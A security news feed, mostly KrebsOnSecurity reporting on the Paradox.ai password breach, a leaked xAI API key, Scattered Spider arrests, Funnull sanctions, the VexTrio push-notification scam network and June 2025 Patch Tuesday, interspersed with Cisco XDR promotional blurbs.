And the scariest thing is: this data array is not just an archive. It is material for analysis that has ALREADY BEEN DONE . With the help of modern tools, they see everything:

Graphs of your contacts and activity.
Relationships between nicknames, emails, password hashes and Jabber ID.
Timestamps, IP addresses and digital fingerprints.
Your unique writing style, phraseology, punctuation, consistency of grammatical errors, and even typical typos that will link your accounts on different platforms.

They are not looking for a needle in a haystack. They simply sifted the haystack through the AI sieve and got ready-made dossiers.

Customize Your Defense: Unlock Cisco XDR With Key Integrations

The new Cisco XDR Connect tool helps users to search, browse, and view the details of all available XDR integrations and automation content.

Poor Passwords Tattle on AI Hiring Bot Maker Paradox.ai

Security researchers recently revealed that the personal information of millions of people who applied for jobs at McDonald’s was exposed after they guessed the password (“123456”) for the fast food chain’s account at Paradox.ai, a company that makes artificial intelligence based hiring chatbots used by many Fortune 500 firms. Paradox.ai said the security oversight was an isolated incident that did not affect its other customers, but recent security breaches involving its employees in Vietnam tell a more nuanced story.

A screenshot of the paradox.ai homepage showing its AI hiring chatbot “Olivia” interacting with potential hires.

Earlier this month, security researchers Ian Carroll and Sam Curry wrote about simple methods they found to access the backend of the AI chatbot platform on McHire.com, the McDonald’s website that many of its franchisees use to screen job applicants. As first reported by Wired, the researchers discovered that the weak password used by Paradox exposed 64 million records, including applicants’ names, email addresses and phone numbers.

Paradox.ai acknowledged the researchers’ findings but said the company’s other client instances were not affected, and that no sensitive information — such as Social Security numbers — was exposed.

“We are confident, based on our records, this test account was not accessed by any third party other than the security researchers,” the company wrote in a July 9 blog post. “It had not been logged into since 2019 and frankly, should have been decommissioned. We want to be very clear that while the researchers may have briefly had access to the system containing all chat interactions (NOT job applications), they only viewed and downloaded five chats in total that had candidate information within. Again, at no point was any data leaked online or made public.”

However, a review of stolen password data gathered by multiple breach-tracking services shows that at the end of June 2025, a Paradox.ai administrator in Vietnam suffered a malware compromise on their device that stole usernames and passwords for a variety of internal and third-party online services. The results were not pretty.

The password data from the Paradox.ai developer was stolen by a malware strain known as “Nexus Stealer,” a form grabber and password stealer that is sold on cybercrime forums. The information snarfed by stealers like Nexus is often recovered and indexed by data leak aggregator services like Intelligence X, which reports that the malware on the Paradox.ai developer’s device exposed hundreds of mostly poor and recycled passwords (using the same base password but slightly different characters at the end).

Those purloined credentials show the developer in question at one point used the same seven-digit password to log in to Paradox.ai accounts for a number of Fortune 500 firms listed as customers on the company’s website, including Aramark, Lockheed Martin, Lowes, and Pepsi.

Seven-character passwords, particularly those consisting entirely of numerals, are highly vulnerable to “brute-force” attacks that can try a large number of possible password combinations in quick succession. According to a much-referenced password strength guide maintained by Hive Systems, modern password-cracking systems can work out a seven number password more or less instantly.

Image: hivesystems.com.

In response to questions from KrebsOnSecurity, Paradox.ai confirmed that the password data was recently stolen by a malware infection on the personal device of a longtime Paradox developer based in Vietnam, and said the company was made aware of the compromise shortly after it happened. Paradox maintains that few of the exposed passwords were still valid, and that a majority of them were present on the employee’s personal device only because he had migrated the contents of a password manager from an old computer.

Paradox also pointed out that it has been requiring single sign-on (SSO) authentication since 2020 that enforces multi-factor authentication for its partners. Still, a review of the exposed passwords shows they included the Vietnamese administrator’s credentials to the company’s SSO platform — paradoxai.okta.com. The password for that account ended in 202506 — possibly a reference to the month of June 2025 — and the digital cookie left behind after a successful Okta login with those credentials says it was valid until December 2025.

Also exposed were the administrator’s credentials and authentication cookies for an account at Atlassian, a platform made for software development and project management. The expiration date for that authentication token likewise was December 2025.

Infostealer infections are among the leading causes of data breaches and ransomware attacks today, and they result in the theft of stored passwords and any credentials the victim types into a browser. Most infostealer malware also will siphon authentication cookies stored on the victim’s device, and depending on how those tokens are configured thieves may be able to use them to bypass login prompts and/or multi-factor authentication.

Quite often these infostealer infections will open a backdoor on the victim’s device that allows attackers to access the infected machine remotely. Indeed, it appears that remote access to the Paradox administrator’s compromised device was offered for sale recently.

In February 2019, Paradox.ai announced it had successfully completed audits for two fairly comprehensive security standards (ISO 27001 and SOC 2 Type II). Meanwhile, the company’s security disclosure this month says the test account with the atrocious 123456 username and password was last accessed in 2019, but somehow missed in their annual penetration tests. So how did it manage to pass such stringent security audits with these practices in place?

Paradox.ai told KrebsOnSecurity that at the time of the 2019 audit, the company’s various contractors were not held to the same security standards the company practices internally. Paradox emphasized that this has changed, and that it has updated its security and password requirements multiple times since then.

It is unclear how the Paradox developer in Vietnam infected his computer with malware, but a closer review finds a Windows device for another Paradox.ai employee from Vietnam was compromised by similar data-stealing malware at the end of 2024 (that compromise included the victim’s GitHub credentials). In the case of both employees, the stolen credential data includes Web browser logs that indicate the victims repeatedly downloaded pirated movies and television shows, which are often bundled with malware disguised as a video codec needed to view the pirated content.

DOGE Denizen Marko Elez Leaked API Key for xAI

Marko Elez, a 25-year-old employee at Elon Musk’s Department of Government Efficiency (DOGE), has been granted access to sensitive databases at the U.S. Social Security Administration, the Treasury and Justice departments, and the Department of Homeland Security. So it should fill all Americans with a deep sense of confidence to learn that Mr. Elez over the weekend inadvertently published a private key that allowed anyone to interact directly with more than four dozen large language models (LLMs) developed by Musk’s artificial intelligence company xAI.

Image: Shutterstock, @sdx15.

On July 13, Mr. Elez committed a code script to GitHub called “agent.py” that included a private application programming interface (API) key for xAI. The inclusion of the private key was first flagged by GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users.

Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, said the exposed API key allowed access to at least 52 different LLMs used by xAI. The most recent LLM in the list was called “grok-4-0709” and was created on July 9, 2025.

Grok, the generative AI chatbot developed by xAI and integrated into Twitter/X, relies on these and other LLMs (a query to Grok before publication shows Grok currently uses Grok-3, which was launched in Feburary 2025). Earlier today, xAI announced that the Department of Defense will begin using Grok as part of a contract worth up to $200 million. The contract award came less than a week after Grok began spewing antisemitic rants and invoking Adolf Hitler.

Mr. Elez did not respond to a request for comment. The code repository containing the private xAI key was removed shortly after Caturegli notified Elez via email. However, Caturegli said the exposed API key still works and has not yet been revoked.

“If a developer can’t keep an API key private, it raises questions about how they’re handling far more sensitive government information behind closed doors,” Caturegli told KrebsOnSecurity.

Prior to joining DOGE, Marko Elez worked for a number of Musk’s companies. His DOGE career began at the Department of the Treasury, and a legal battle over DOGE’s access to Treasury databases showed Elez was sending unencrypted personal information in violation of the agency’s policies.

While still at Treasury, Elez resigned after The Wall Street Journal linked him to social media posts that advocated racism and eugenics. When Vice President J.D. Vance lobbied for Elez to be rehired, President Trump agreed and Musk reinstated him.

Since his re-hiring as a DOGE employee, Elez has been granted access to databases at one federal agency after another. TechCrunch reported in February 2025 that he was working at the Social Security Administration. In March, Business Insider found Elez was part of a DOGE detachment assigned to the Department of Labor.

Marko Elez, in a photo from a social media profile.

In April, The New York Times reported that Elez held positions at the U.S. Customs and Border Protection and the Immigration and Customs Enforcement (ICE) bureaus, as well as the Department of Homeland Security. The Washington Post later reported that Elez, while serving as a DOGE advisor at the Department of Justice, had gained access to the Executive Office for Immigration Review’s Courts and Appeals System (EACS).

Elez is not the first DOGE worker to publish internal API keys for xAI: In May, KrebsOnSecurity detailed how another DOGE employee leaked a private xAI key on GitHub for two months, exposing LLMs that were custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X.

Caturegli said it’s difficult to trust someone with access to confidential government systems when they can’t even manage the basics of operational security.

“One leak is a mistake,” he said. “But when the same type of sensitive key gets exposed again and again, it’s not just bad luck, it’s a sign of deeper negligence and a broken security culture.”

UK Arrests Four in ‘Scattered Spider’ Ransom Group

Authorities in the United Kingdom this week arrested four people aged 17 to 20 in connection with recent data theft and extortion attacks against the retailers Marks & Spencer and Harrods, and the British food retailer Co-op Group. The breaches have been linked to a prolific but loosely-affiliated cybercrime group dubbed “Scattered Spider,” whose other recent victims include multiple airlines.

The U.K.’s National Crime Agency (NCA) declined verify the names of those arrested, saying only that they included two males aged 19, another aged 17, and 20-year-old female.

Scattered Spider is the name given to an English-speaking cybercrime group known for using social engineering tactics to break into companies and steal data for ransom, often impersonating employees or contractors to deceive IT help desks into granting access. The FBI warned last month that Scattered Spider had recently shifted to targeting companies in the retail and airline sectors.

KrebsOnSecurity has learned the identities of two of the suspects. Multiple sources close to the investigation said those arrested include Owen David Flowers, a U.K. man alleged to have been involved in the cyber intrusion and ransomware attack that shut down several MGM Casino properties in September 2023. Those same sources said the woman arrested is or recently was in a relationship with Flowers.

Sources told KrebsOnSecurity that Flowers, who allegedly went by the hacker handles “bo764,” “Holy,” and “Nazi,” was the group member who anonymously gave interviews to the media in the days after the MGM hack. His real name was omitted from a September 2024 story about the group because he was not yet charged in that incident.

The bigger fish arrested this week is 19-year-old Thalha Jubair, a U.K. man whose alleged exploits under various monikers have been well-documented in stories on this site. Jubair is believed to have used the nickname “Earth2Star,” which corresponds to a founding member of the cybercrime-focused Telegram channel “Star Fraud Chat.”

In 2023, KrebsOnSecurity published an investigation into the work of three different SIM-swapping groups that phished credentials from T-Mobile employees and used that access to offer a service whereby any T-Mobile phone number could be swapped to a new device. Star Chat was by far the most active and consequential of the three SIM-swapping groups, who collectively broke into T-Mobile’s network more than 100 times in the second half of 2022.

Jubair allegedly used the handles “Earth2Star” and “Star Ace,” and was a core member of a prolific SIM-swapping group operating in 2022. Star Ace posted this image to the Star Fraud chat channel on Telegram, and it lists various prices for SIM-swaps.

Sources tell KrebsOnSecurity that Jubair also was a core member of the LAPSUS$ cybercrime group that broke into dozens of technology companies in 2022, stealing source code and other internal data from tech giants including Microsoft, Nvidia, Okta, Rockstar Games, Samsung, T-Mobile, and Uber.

In April 2022, KrebsOnSecurity published internal chat records from LAPSUS$, and those chats indicated Jubair was using the nicknames Amtrak and Asyntax. At one point in the chats, Amtrak told the LAPSUS$ group leader not to share T-Mobile’s logo in images sent to the group because he’d been previously busted for SIM-swapping and his parents would suspect he was back at it again.

As shown in those chats, the leader of LAPSUS$ eventually decided to betray Amtrak by posting his real name, phone number, and other hacker handles into a public chat room on Telegram.

In March 2022, the leader of the LAPSUS$ data extortion group exposed Thalha Jubair’s name and hacker handles in a public chat room on Telegram.

That story about the leaked LAPSUS$ chats connected Amtrak/Asyntax/Jubair to the identity “Everlynn,” the founder of a cybercriminal service that sold fraudulent “emergency data requests” targeting the major social media and email providers. In such schemes, the hackers compromise email accounts tied to police departments and government agencies, and then send unauthorized demands for subscriber data while claiming the information being requested can’t wait for a court order because it relates to an urgent matter of life and death.

The roster of the now-defunct “Infinity Recursion” hacking team, from which some member of LAPSUS$ hail.

Sources say Jubair also used the nickname “Operator,” and that until recently he was the administrator of the Doxbin, a long-running and highly toxic online community that is used to “dox” or post deeply personal information on people. In May 2024, several popular cybercrime channels on Telegram ridiculed Operator after it was revealed that he’d staged his own kidnapping in a botched plan to throw off law enforcement investigators.

In November 2024, U.S. authorities charged five men aged 20 to 25 in connection with the Scattered Spider group, which has long relied on recruiting minors to carry out its most risky activities. Indeed, many of the group’s core members were recruited from online gaming platforms like Roblox and Minecraft in their early teens, and have been perfecting their social engineering tactics for years.

“There is a clear pattern that some of the most depraved threat actors first joined cybercrime gangs at an exceptionally young age,” said Allison Nixon, chief research officer at the New York based security firm Unit 221B. “Cybercriminals arrested at 15 or younger need serious intervention and monitoring to prevent a years long massive escalation.”

Cisco Catalyst 8300 Excels in NetSecOPEN NGFW SD-WAN Security Tests

Cisco Catalyst 8300 earns NetSecOPEN certification for exceptional real-world NGFW and SD-WAN performance under modern enterprise conditions.

Big Tech’s Mixed Response to U.S. Treasury Sanctions

In May 2025, the U.S. government sanctioned a Chinese national for operating a cloud provider linked to the majority of virtual currency investment scam websites reported to the FBI. But a new report finds the accused continues to operate a slew of established accounts at American tech companies — including Facebook, Github, PayPal and Twitter/X.

On May 29, the U.S. Department of the Treasury announced economic sanctions against Funnull Technology Inc., a Philippines-based company alleged to provide infrastructure for hundreds of thousands of websites involved in virtual currency investment scams known as “pig butchering.” In January 2025, KrebsOnSecurity detailed how Funnull was designed as a content delivery network that catered to foreign cybercriminals seeking to route their traffic through U.S.-based cloud providers.

The Treasury also sanctioned Funnull’s alleged operator, a 40-year-old Chinese national named Liu “Steve” Lizhi. The government says Funnull directly facilitated financial schemes resulting in more than $200 million in financial losses by Americans, and that the company’s operations were linked to the majority of pig butchering scams reported to the FBI.

It is generally illegal for U.S. companies or individuals to transact with people sanctioned by the Treasury. However, as Mr. Lizhi’s case makes clear, just because someone is sanctioned doesn’t necessarily mean big tech companies are going to suspend their online accounts.

The government says Lizhi was born November 13, 1984, and used the nicknames “XXL4” and “Nice Lizhi.” Nevertheless, Steve Liu’s 17-year-old account on LinkedIn (in the name “Liulizhi”) had hundreds of followers (Lizhi’s LinkedIn profile helpfully confirms his birthday) until quite recently: The account was deleted this morning, just hours after KrebsOnSecurity sought comment from LinkedIn.

Mr. Lizhi’s LinkedIn account was suspended sometime in the last 24 hours, after KrebsOnSecurity sought comment from LinkedIn.

In an emailed response, a LinkedIn spokesperson said the company’s “Prohibited countries policy” states that LinkedIn “does not sell, license, support or otherwise make available its Premium accounts or other paid products and services to individuals and companies sanctioned by the U.S. government.” LinkedIn declined to say whether the profile in question was a premium or free account.

Mr. Lizhi also maintains a working PayPal account under the name Liu Lizhi and username “@nicelizhi,” another nickname listed in the Treasury sanctions. A 15-year-old Twitter/X account named “Lizhi” that links to Mr. Lizhi’s personal domain remains active, although it has few followers and hasn’t posted in years.

These accounts and many others were flagged by the security firm Silent Push, which has been tracking Funnull’s operations for the past year and calling out U.S. cloud providers like Amazon and Microsoft for failing to more quickly sever ties with the company.

Liu Lizhi’s PayPal account.

In a report released today, Silent Push found Lizhi still operates numerous Facebook accounts and groups, including a private Facebook account under the name Liu Lizhi. Another Facebook account clearly connected to Lizhi is a tourism page for Ganzhou, China called “EnjoyGanzhou” that was named in the Treasury Department sanctions.

“This guy is the technical administrator for the infrastructure that is hosting a majority of scams targeting people in the United States, and hundreds of millions have been lost based on the websites he’s been hosting,” said Zach Edwards, senior threat researcher at Silent Push. “It’s crazy that the vast majority of big tech companies haven’t done anything to cut ties with this guy.”

The FBI says it received nearly 150,000 complaints last year involving digital assets and $9.3 billion in losses — a 66 percent increase from the previous year. Investment scams were the top crypto-related crimes reported, with $5.8 billion in losses.

In a statement, a Meta spokesperson said the company continuously takes steps to meet its legal obligations, but that sanctions laws are complex and varied. They explained that sanctions are often targeted in nature and don’t always prohibit people from having a presence on its platform. Nevertheless, Meta confirmed it had removed the account, unpublished Pages, and removed Groups and events associated with the user for violating its policies.

Attempts to reach Mr. Lizhi via his primary email addresses at Hotmail and Gmail bounced as undeliverable. Likewise, his 14-year-old YouTube channel appears to have been taken down recently.

However, anyone interested in viewing or using Mr. Lizhi’s 146 computer code repositories will have no problem finding GitHub accounts for him, including one registered under the NiceLizhi and XXL4 nicknames mentioned in the Treasury sanctions.

One of multiple GitHub profiles used by Liu “Steve” Lizhi, who uses the nickname XXL4 (a moniker listed in the Treasury sanctions for Mr. Lizhi).

Mr. Lizhi also operates a GitHub page for an open source e-commerce platform called NexaMerchant, which advertises itself as a payment gateway working with numerous American financial institutions. Interestingly, this profile’s “followers” page shows several other accounts that appear to be Mr. Lizhi’s. All of the account’s followers are tagged as “suspended,” even though that suspended message does not display when one visits those individual profiles.

In response to questions, GitHub said it has a process in place to identify when users and customers are Specially Designated Nationals or other denied or blocked parties, but that it locks those accounts instead of removing them. According to its policy, GitHub takes care that users and customers aren’t impacted beyond what is required by law.

All of the follower accounts for the XXL4 GitHub account appear to be Mr. Lizhi’s, and have been suspended by GitHub, but their code is still accessible.

“This includes keeping public repositories, including those for open source projects, available and accessible to support personal communications involving developers in sanctioned regions,” the policy states. “This also means GitHub will advocate for developers in sanctioned regions to enjoy greater access to the platform and full access to the global open source community.”

Edwards said it’s great that GitHub has a process for handling sanctioned accounts, but that the process doesn’t seem to communicate risk in a transparent way, noting that the only indicator on the locked accounts is the message, “This repository has been archived by the owner. It is not read-only.”

“It’s an odd message that doesn’t communicate, ‘This is a sanctioned entity, don’t fork this code or use it in a production environment’,” Edwards said.

Mark Rasch is a former federal cybercrime prosecutor who now serves as counsel for the New York City based security consulting firm Unit 221B. Rasch said when Treasury’s Office of Foreign Assets Control (OFAC) sanctions a person or entity, it then becomes illegal for businesses or organizations to transact with the sanctioned party.

Rasch said financial institutions have very mature systems for severing accounts tied to people who become subject to OFAC sanctions, but that tech companies may be far less proactive — particularly with free accounts.

“Banks have established ways of checking [U.S. government sanctions lists] for sanctioned entities, but tech companies don’t necessarily do a good job with that, especially for services that you can just click and sign up for,” Rasch said. “It’s potentially a risk and liability for the tech companies involved, but only to the extent OFAC is willing to enforce it.”

Liu Lizhi operates numerous Facebook accounts and groups, including this one for an entity specified in the OFAC sanctions: The “Enjoy Ganzhou” tourism page for Ganzhou, China. Image: Silent Push.

In July 2024, Funnull purchased the domain polyfill[.]io, the longtime home of a legitimate open source project that allowed websites to ensure that devices using legacy browsers could still render content in newer formats. After the Polyfill domain changed hands, at least 384,000 websites were caught in a supply-chain attack that redirected visitors to malicious sites. According to the Treasury, Funnull used the code to redirect people to scam websites and online gambling sites, some of which were linked to Chinese criminal money laundering operations.

The U.S. government says Funnull provides domain names for websites on its purchased IP addresses, using domain generation algorithms (DGAs) — programs that generate large numbers of similar but unique names for websites — and that it sells web design templates to cybercriminals.

“These services not only make it easier for cybercriminals to impersonate trusted brands when creating scam websites, but also allow them to quickly change to different domain names and IP addresses when legitimate providers attempt to take the websites down,” reads a Treasury statement.

Meanwhile, Funnull appears to be morphing nearly all aspects of its business in the wake of the sanctions, Edwards said.

“Whereas before they might have used 60 DGA domains to hide and bounce their traffic, we’re seeing far more now,” he said. “They’re trying to make their infrastructure harder to track and more complicated, so for now they’re not going away but more just changing what they’re doing. And a lot more organizations should be holding their feet to the fire.”

Update, 2:48 PM ET: Added response from Meta, which confirmed it has closed the accounts and groups connected to Mr. Lizhi.

Update, July 7, 6:56 p.m. ET: In a written statement, PayPal said it continually works to combat and prevent the illicit use of its services.

“We devote significant resources globally to financial crime compliance, and we proactively refer cases to and assist law enforcement officials around the world in their efforts to identify, investigate and stop illegal activity,” the statement reads.

Building an XDR Integration With Splunk Attack Analyzer

Cisco XDR is an infinitely extensible platform for security integrations. Like the maturing SOCs of our customers, the event SOC team at Cisco Live San Diego 2025 built custom integrations to meet our needs. You can build your own integrations using the community resources announced at Cisco Live. It was an honor to work with […]

Secure Endpoint Enhancements Elevate Cisco XDR and Breach Protection Suite

Discover how Secure Endpoint enhancements elevate Cisco XDR and the Breach Protection Suite with better visibility and advanced threat defense.

Minnesota Shooting Suspect Allegedly Used Data Broker Sites to Find Targets’ Addresses

The shooter allegedly researched several “people search” sites in an attempt to target his victims, highlighting the potential dangers of widely available personal data.

XDR still means so much more than some may realize

Cisco has been named a Leader and Fast Mover in GigaOm's Radar for Extended Detection and Response (XDR). Learn what sets Cisco XDR apart in our blog.

Inside a Dark Adtech Empire Fed by Fake CAPTCHAs

Late last year, security researchers made a startling discovery: Kremlin-backed disinformation campaigns were bypassing moderation on social media platforms by leveraging the same malicious advertising technology that powers a sprawling ecosystem of online hucksters and website hackers. A new report on the fallout from that investigation finds this dark ad tech industry is far more resilient and incestuous than previously known.

Image: Infoblox.

In November 2024, researchers at the security firm Qurium published an investigation into “Doppelganger,” a disinformation network that promotes pro-Russian narratives and infiltrates Europe’s media landscape by pushing fake news through a network of cloned websites.

Doppelganger campaigns use specialized links that bounce the visitor’s browser through a long series of domains before the fake news content is served. Qurium found Doppelganger relies on a sophisticated “domain cloaking” service, a technology that allows websites to present different content to search engines compared to what regular visitors see. The use of cloaking services helps the disinformation sites remain online longer than they otherwise would, while ensuring that only the targeted audience gets to view the intended content.

Qurium discovered that Doppelganger’s cloaking service also promoted online dating sites, and shared much of the same infrastructure with VexTrio, which is thought to be the oldest malicious traffic distribution system (TDS) in existence. While TDSs are commonly used by legitimate advertising networks to manage traffic from disparate sources and to track who or what is behind each click, VexTrio’s TDS largely manages web traffic from victims of phishing, malware, and social engineering scams.

BREAKING BAD

Digging deeper, Qurium noticed Doppelganger’s cloaking service used an Internet provider in Switzerland as the first entry point in a chain of domain redirections. They also noticed the same infrastructure hosted a pair of co-branded affiliate marketing services that were driving traffic to sketchy adult dating sites: LosPollos[.]com and TacoLoco[.]co.

The LosPollos ad network incorporates many elements and references from the hit series “Breaking Bad,” mirroring the fictional “Los Pollos Hermanos” restaurant chain that served as a money laundering operation for a violent methamphetamine cartel.

The LosPollos advertising network invokes characters and themes from the hit show Breaking Bad. The logo for LosPollos (upper left) is the image of Gustavo Fring, the fictional chicken restaurant chain owner in the show.

Affiliates who sign up with LosPollos are given JavaScript-heavy “smartlinks” that drive traffic into the VexTrio TDS, which in turn distributes the traffic among a variety of advertising partners, including dating services, sweepstakes offers, bait-and-switch mobile apps, financial scams and malware download sites.

LosPollos affiliates typically stitch these smart links into WordPress websites that have been hacked via known vulnerabilities, and those affiliates will earn a small commission each time an Internet user referred by any of their hacked sites falls for one of these lures.

The Los Pollos advertising network promoting itself on LinkedIn.

According to Qurium, TacoLoco is a traffic monetization network that uses deceptive tactics to trick Internet users into enabling “push notifications,” a cross-platform browser standard that allows websites to show pop-up messages which appear outside of the browser. For example, on Microsoft Windows systems these notifications typically show up in the bottom right corner of the screen — just above the system clock.

In the case of VexTrio and TacoLoco, the notification approval requests themselves are deceptive — disguised as “CAPTCHA” challenges designed to distinguish automated bot traffic from real visitors. For years, VexTrio and its partners have successfully tricked countless users into enabling these site notifications, which are then used to continuously pepper the victim’s device with a variety of phony virus alerts and misleading pop-up messages.

Examples of VexTrio landing pages that lead users to accept push notifications on their device.

According to a December 2024 annual report from GoDaddy, nearly 40 percent of compromised websites in 2024 redirected visitors to VexTrio via LosPollos smartlinks.

ADSPRO AND TEKNOLOGY

On November 14, 2024, Qurium published research to support its findings that LosPollos and TacoLoco were services operated by Adspro Group, a company registered in the Czech Republic and Russia, and that Adspro runs its infrastructure at the Swiss hosting providers C41 and Teknology SA.

Qurium noted the LosPollos and TacoLoco sites state that their content is copyrighted by ByteCore AG and SkyForge Digital AG, both Swiss firms that are run by the owner of Teknology SA, Giulio Vitorrio Leonardo Cerutti. Further investigation revealed LosPollos and TacoLoco were apps developed by a company called Holacode, which lists Cerutti as its CEO.

The apps marketed by Holacode include numerous VPN services, as well as one called Spamshield that claims to stop unwanted push notifications. But in January, Infoblox said they tested the app on their own mobile devices, and found it hides the user’s notifications, and then after 24 hours stops hiding them and demands payment. Spamshield subsequently changed its developer name from Holacode to ApLabz, although Infoblox noted that the Terms of Service for several of the rebranded ApLabz apps still referenced Holacode in their terms of service.

Incredibly, Cerutti threatened to sue me for defamation before I’d even uttered his name or sent him a request for comment (Cerutti sent the unsolicited legal threat back in January after his company and my name were merely tagged in an Infoblox post on LinkedIn about VexTrio).

Asked to comment on the findings by Qurium and Infoblox, Cerutti vehemently denied being associated with VexTrio. Cerutti asserted that his companies all strictly adhere to the regulations of the countries in which they operate, and that they have been completely transparent about all of their operations.

“We are a group operating in the advertising and marketing space, with an affiliate network program,” Cerutti responded. “I am not [going] to say we are perfect, but I strongly declare we have no connection with VexTrio at all.”

“Unfortunately, as a big player in this space we also get to deal with plenty of publisher fraud, sketchy traffic, fake clicks, bots, hacked, listed and resold publisher accounts, etc, etc.,” Cerutti continued. “We bleed lots of money to such malpractices and conduct regular internal screenings and audits in a constant battle to remove bad traffic sources. It is also a highly competitive space, where some upstarts will often play dirty against more established mainstream players like us.”

Working with Qurium, researchers at the security firm Infoblox released details about VexTrio’s infrastructure to their industry partners. Just four days after Qurium published its findings, LosPollos announced it was suspending its push monetization service. Less than a month later, Adspro had rebranded to Aimed Global.

A mind map illustrating some of the key findings and connections in the Infoblox and Qurium investigations. Click to enlarge.

A REVEALING PIVOT

In March 2025, researchers at GoDaddy chronicled how DollyWay — a malware strain that has consistently redirected victims to VexTrio throughout its eight years of activity — suddenly stopped doing that on November 20, 2024. Virtually overnight, DollyWay and several other malware families that had previously used VexTrio began pushing their traffic through another TDS called Help TDS.

Digging further into historical DNS records and the unique code scripts used by the Help TDS, Infoblox determined it has long enjoyed an exclusive relationship with VexTrio (at least until LosPollos ended its push monetization service in November).

In a report released today, Infoblox said an exhaustive analysis of the JavaScript code, website lures, smartlinks and DNS patterns used by VexTrio and Help TDS linked them with at least four other TDS operators (not counting TacoLoco). Those four entities — Partners House, BroPush, RichAds and RexPush — are all Russia-based push monetization programs that pay affiliates to drive signups for a variety of schemes, but mostly online dating services.

“As Los Pollos push monetization ended, we’ve seen an increase in fake CAPTCHAs that drive user acceptance of push notifications, particularly from Partners House,” the Infoblox report reads. “The relationship of these commercial entities remains a mystery; while they are certainly long-time partners redirecting traffic to one another, and they all have a Russian nexus, there is no overt common ownership.”

Renee Burton, vice president of threat intelligence at Infoblox, said the security industry generally treats the deceptive methods used by VexTrio and other malicious TDSs as a kind of legally grey area that is mostly associated with less dangerous security threats, such as adware and scareware.

But Burton argues that this view is myopic, and helps perpetuate a dark adtech industry that also pushes plenty of straight-up malware, noting that hundreds of thousands of compromised websites around the world every year redirect victims to the tangled web of VexTrio and VexTrio-affiliate TDSs.

“These TDSs are a nefarious threat, because they’re the ones you can connect to the delivery of things like information stealers and scams that cost consumers billions of dollars a year,” Burton said. “From a larger strategic perspective, my takeaway is that Russian organized crime has control of malicious adtech, and these are just some of the many groups involved.”

WHAT CAN YOU DO?

As KrebsOnSecurity warned way back in 2020, it’s a good idea to be very sparing in approving notifications when browsing the Web. In many cases these notifications are benign, but as we’ve seen there are numerous dodgy firms that are paying site owners to install their notification scripts, and then reselling that communications pathway to scammers and online hucksters.

If you’d like to prevent sites from ever presenting notification requests, all of the major browser makers let you do this — either across the board or on a per-website basis. While it is true that blocking notifications entirely can break the functionality of some websites, doing this for any devices you manage on behalf of your less tech-savvy friends or family members might end up saving everyone a lot of headache down the road.

To modify site notification settings in Mozilla Firefox, navigate to Settings, Privacy & Security, Permissions, and click the “Settings” tab next to “Notifications.” That page will display any notifications already permitted and allow you to edit or delete any entries. Tick the box next to “Block new requests asking to allow notifications” to stop them altogether.

In Google Chrome, click the icon with the three dots to the right of the address bar, scroll all the way down to Settings, Privacy and Security, Site Settings, and Notifications. Select the “Don’t allow sites to send notifications” button if you want to banish notification requests forever.

In Apple’s Safari browser, go to Settings, Websites, and click on Notifications in the sidebar. Uncheck the option to “allow websites to ask for permission to send notifications” if you wish to turn off notification requests entirely.

Patch Tuesday, June 2025 Edition

Microsoft today released security updates to fix at least 67 vulnerabilities in its Windows operating systems and software. Redmond warns that one of the flaws is already under active attack, and that software blueprints showing how to exploit a pervasive Windows bug patched this month are now public.

The sole zero-day flaw this month is CVE-2025-33053, a remote code execution flaw in the Windows implementation of WebDAV — an HTTP extension that lets users remotely manage files and directories on a server. While WebDAV isn’t enabled by default in Windows, its presence in legacy or specialized systems still makes it a relevant target, said Seth Hoyt, senior security engineer at Automox.

Adam Barnett, lead software engineer at Rapid7, said Microsoft’s advisory for CVE-2025-33053 does not mention that the Windows implementation of WebDAV is listed as deprecated since November 2023, which in practical terms means that the WebClient service no longer starts by default.

“The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control,” Barnett said. “Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2.”

Microsoft warns that an “elevation of privilege” vulnerability in the Windows Server Message Block (SMB) client (CVE-2025-33073) is likely to be exploited, given that proof-of-concept code for this bug is now public. CVE-2025-33073 has a CVSS risk score of 8.8 (out of 10), and exploitation of the flaw leads to the attacker gaining “SYSTEM” level control over a vulnerable PC.

“What makes this especially dangerous is that no further user interaction is required after the initial connection—something attackers can often trigger without the user realizing it,” said Alex Vovk, co-founder and CEO of Action1. “Given the high privilege level and ease of exploitation, this flaw poses a significant risk to Windows environments. The scope of affected systems is extensive, as SMB is a core Windows protocol used for file and printer sharing and inter-process communication.”

Beyond these highlights, 10 of the vulnerabilities fixed this month were rated “critical” by Microsoft, including eight remote code execution flaws.

Notably absent from this month’s patch batch is a fix for a newly discovered weakness in Windows Server 2025 that allows attackers to act with the privileges of any user in Active Directory. The bug, dubbed “BadSuccessor,” was publicly disclosed by researchers at Akamai on May 21, and several public proof-of-concepts are now available. Tenable’s Satnam Narang said organizations that have at least one Windows Server 2025 domain controller should review permissions for principals and limit those permissions as much as possible.

Adobe has released updates for Acrobat Reader and six other products addressing at least 259 vulnerabilities, most of them in an update for Experience Manager. Mozilla Firefox and Google Chrome both recently released security updates that require a restart of the browser to take effect. The latest Chrome update fixes two zero-day exploits in the browser (CVE-2025-5419 and CVE-2025-4664).

For a detailed breakdown on the individual security updates released by Microsoft today, check out the Patch Tuesday roundup from the SANS Internet Storm Center. Action 1 has a breakdown of patches from Microsoft and a raft of other software vendors releasing fixes this month. As always, please back up your system and/or data before patching, and feel free to drop a note in the comments if you run into any problems applying these updates.

Cybercriminals Are Hiding Malicious Web Traffic in Plain Sight

In an effort to evade detection, cybercriminals are increasingly turning to “residential proxy” services that cover their tracks by making it look like everyday online activity.

What Really Happened in the Aftermath of the Lizard Squad Hacks

On Christmas Day in 2014 hackers knocked out the Xbox and PlayStation gaming networks, impacting how video game companies handled cybersecurity for years.

Oops: DanaBot Malware Devs Infected Their Own PCs

The U.S. government today unsealed criminal charges against 16 individuals accused of operating and selling DanaBot, a prolific strain of information-stealing malware that has been sold on Russian cybercrime forums since 2018. The FBI says a newer version of DanaBot was used for espionage, and that many of the defendants exposed their real-life identities after accidentally infecting their own systems with the malware.

DanaBot’s features, as promoted on its support site. Image: welivesecurity.com.

